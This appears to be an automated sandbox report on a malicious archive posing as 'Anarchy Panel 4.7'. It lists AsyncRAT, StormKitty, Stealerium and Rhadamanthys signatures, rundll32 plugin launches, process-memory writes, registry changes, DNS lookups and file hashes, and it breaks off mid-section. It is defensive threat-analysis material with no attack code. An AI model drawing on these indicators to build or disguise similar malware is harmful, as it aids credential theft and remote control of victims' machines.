Malware Analysis Report

2024-10-23 19:20

Sample ID 230719-ayb4saeg84
Target s.rar
SHA256 d531f8fe97a22396c8569bc48eea4a808f36631466770d170095ffcc41c50f0e
Tags
rat asyncrat stormkitty stealerium rhadamanthys evasion persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d531f8fe97a22396c8569bc48eea4a808f36631466770d170095ffcc41c50f0e

Threat Level: Known bad

The file s.rar was found to be: Known bad.

Malicious Activity Summary

rat asyncrat stormkitty stealerium rhadamanthys evasion persistence stealer

Async RAT payload

Stealerium family

Suspicious use of NtCreateUserProcessOtherParentProcess

StormKitty payload

Rhadamanthys

Stormkitty family

Detect rhadamanthys stealer shellcode

Asyncrat family

Blocklisted process makes network request

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-19 00:36

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

Stealerium family

stealerium

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral21

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1563s

Max time network

1567s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1565s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

802s

Max time network

1131s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1562s

Command Line

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20805a37d9b9d901 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "396491998" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{61B24061-25CC-11EE-A97A-5E587CD0922C} = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000081fc177b9287ed4a8181eac127bbbd69000000000200000000001066000000010000200000001cf0b4088ed36ad859cc95f6426934e3b4cc014dbaee2abccc48d757cebbe47c000000000e8000000002000020000000764f810b931477111a3c83e8d70260f44da3b229f34dad71c9619edac74f2c17200000003482da31c59790cb62cc00fc2fa41408aa84820fd84ce5ae0a9ad0326ef82a43400000004e81a7c147764b7abd43dec19c0d79b4157602e7c9cff3e768859f294684576a6c360ec0ca8d4b245baa62fd575d22d599404e720fef31efaeab55d52b2ededd C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000081fc177b9287ed4a8181eac127bbbd690000000002000000000010660000000100002000000004fd83efa4fd8c76d1131590788f96459fed7d6597d61f66dd337c7584dd8b69000000000e8000000002000020000000c67e0f6964abfb0c0f5e8e36c6ea46647252240da6fa482204566e52364e1cb390000000a90a9faa5863949da0403cc56c259ddf63762eee35268f4d9aa15422875417b03784ec3fe20d563c92869659d8a328d3a982709eabd9cab72458b951b928993f725f50cf8537ac108776dc8b05e53f865e7b29dfa8d734d8d8389d8efebc5c2ad0a95b218df812635f648df5f8b1f351ad298bc7f6e9b01643b319bcbb7485e517898b5cf16a4d2ea7fe3b75df18019b400000002eebcff836935ef55c31b97ef2ed91c3674cf3d0bfb459ff8f87591883b0d5e0b47ec508dd6327d757b9fa3d7016f2da1dd997990006f2f442b4ef3a1eff068e C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

C:\Program Files\Internet Explorer\IEXPLORE.EXE

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2984 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab9741.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\Tar985F.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7cd10d63c58abab932977b550be96c7d
SHA1 070d242fc171a0e46f1f6c17a105669a7c0f7212
SHA256 cbb44dd4d858e5ec9a83a8a8f3036e3b3e360e3de296a324d2f163bb617fa195
SHA512 79dda8cd8417a28807dec51fe2b9495268e7d1e88b4ab383e62baba46ae9678a8a39d2240da799996bfbdf7b8831ae16a6ff4920d697714a866d707d7e577939

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f94c9f0396b1ec6520a853dabbd8e183
SHA1 d41d58279f017a060aeea7ca4df39b41b976070c
SHA256 5147e09fc1796c0daee9b64b27c66b15b97b727c124704888d8d2cd023de7052
SHA512 f22e57ca79e0692c85434cb8942d1d21b281859a4fc6663552ad5a99d785e24fbe70002a1d17e4e3bd80125299f28d9ab0326700e3e9c2cf38cbbe24de2c82b1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 96e309b7e1715574a74bcd21e3d64bbf
SHA1 376f2419e8812ead26141871331abe92ce4416f4
SHA256 8b853a9863a87254514bd5e5d8161ca44575aa937ef4b07dd935765f4ac11caf
SHA512 8329825df35a1ea9b159d1066c6e3f1bba11ba4532aba684b0ccdd7e03569005e2867fbdf5a2f3698361cde0aca3e49dd5d16ab80996df84238d942103c6fc35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d063a2a6a109e637c29793d143a8523c
SHA1 b5b59967737a6b6528b01d0b2372bab8b335f281
SHA256 97e96c10bd3b0ca4968718bc49a7349f39359608989809c37de4fc3e6ac27fce
SHA512 aeb3a34903f3d73c8a4f79a0b774571826c29ff726d4020c231824ee30e0d6c8bef1801f644102792b4c864de9a39572d5f864bd44ddf6b3756c212e966f1130

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 812b1fd65e07405b366c61df99f4e585
SHA1 0dfbeee834646ca59f3ad311a94fe62efab4c905
SHA256 77197e7b937ea5eba4f3af471c9f9282c7302c23d1837fe062ec396c9a4b8b24
SHA512 b23dc73346b8773326a75482f2852d3925d966b1d16ea96b08aa92b56320db596c6a1da86b3dc91cff4305ccdd27c9132ed5cb9c6e92c40c80ffdd0ece6d104a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 719d7eb33c44ad7b08b6d8fdad8c1b2b
SHA1 80452aa5e8e6348fd4cb3b9c7bb1230ae37ebd94
SHA256 0a20f303b6a073798dcd56f0046f8a1cf2710414f260800599b069959ea6b5d6
SHA512 3cf8e907308d02246c2df7b5b7cfc0e44c24f633a85e4d22b17564101f92b2cb05de93aed1bcd152556202b85f6eafd23cc69b02ec4290cfab0bb4ccb75c6da5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 01bcf6985ccdc4e3d11bbd2ffec444a5
SHA1 022e2cfacbb800cca63d43397576b60ff296902f
SHA256 dfa0bfebc992dd7a6586942df2d05d5a3706bd871e478d5c8a2cc0c366dd3710
SHA512 92e4da814d55004ef1af3d7bb10d5cd110423a781ea227ec7d8ebf02d5b8210b17aa26b6f96ff0fb8f7573dd87c23411b92009632948a2cdbfdc9df368df9f87

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 92b8b0c8a144d74c1cdcc8586e2dc523
SHA1 f9c4f6d7e7a416202d95c15fe605fe499e85f20c
SHA256 1df741becf2fa9f9ad0029c401876fec8531e3482bff5604e1d7eba2ce773950
SHA512 fd47a0305caca4a03d581ca596023869410ab584e7c494716f7270c3b6c260a8e05439992462fd6f27019640901c9ccf630342542a47ee3b621d188bbdf734d3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 91aad0c4911713ddaf4f95024a9c12f5
SHA1 2a29446efef296239a12ce5bee3d14a5f880fee3
SHA256 665f19b0cd501aac7606ad802beb7640dae14a32e160f2013773f41379aab533
SHA512 84e35749533d1402ac3fd8fd65ca372842ef02b9fb93bf872ba616999752cfe6470771cf70b520ce19c4043c8a308949245b58447521ec2784799ee26ed8c1a5

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\977QBXKR\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WMIXVVC4.txt

MD5 358763a5ae28b2285b8c691688a9286e
SHA1 7d2cfa62517e614f0523595748188e2f25cbe718
SHA256 b5297fe487bfa7911d9e18632f0c3bd5fa73c0a708943fffb54da8fdbba6c29f
SHA512 e0d2f629d3db1bb0d48a82f74b6d15db577a35220ff43861802e102f5dcac69277cb076a9daf92f1c78325b8a49f53d7fef965a411def630f8e67945a78cadec

Analysis: behavioral17

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1158s

Max time network

1164s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1558s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1565s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Signatures

N/A

Processes
